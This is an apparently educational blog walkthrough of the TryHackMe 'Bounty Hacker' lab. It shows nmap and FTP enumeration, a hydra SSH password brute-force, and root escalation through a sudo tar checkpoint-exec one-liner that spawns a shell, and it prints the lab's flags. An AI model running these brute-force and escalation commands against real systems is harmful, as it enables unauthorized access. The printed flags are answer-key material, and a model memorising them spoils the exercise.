TryHackMe Bounty Hacker Walkthrough






Bounty Hacker


You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
TryHackMe Bounty Hacker Walkthrough


[Task 1] Living up to the title.


1) Deploy the machine





2) Find open ports on the machine

scan IP address



nmap -A -Pn 10.10.247.118







3) Who wrote the task list?


ftp -A 10.10.247.118

OR


ftp -p 10.10.247.118


OR


ftp 10.10.247.118







Answer :- lin








4) What service can you bruteforce with the text file found?



Answer :- ssh




5) What is the users password?


hydra -l lin -P locks.txt 10.10.130.81 ssh


OR


hydra -l lin -P locks.txt 10.10.130.81 -t 4 ssh

OR


hydra -l lin -P locks.txt 10.10.130.81 -t 4 -e nsr ssh




Answer :- RedDr4gonSynd1cat3








6) user.txt



Login with ssh


ssh lin@10.10.247.118

password :- RedDr4gonSynd1cat3


whoami

ls

cd /Desktop

ls

cat user.txt

THM{CR1M3_SyNd1C4T3}


Ans :- THM{CR1M3_SyNd1C4T3}

  

7) root.txt


go to this link https://gtfobins.github.io/


and  search :-  tar


and then,


click on tar option


and scroll down


and copy this line


Sudo


It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

  
 --> 
  
 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 <--

and paste into ssh bounty hacker account in terminal

and then, let's access

# whoami

root

# cd /root

# ls

root.txt

# cat root.txt

THM{80UN7Y_h4cK3r}



Ans :- THM{80UN7Y_h4cK3r}


 

 

Disclaimer


This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)





Post a Comment

Previous Post Next Post

Contact Form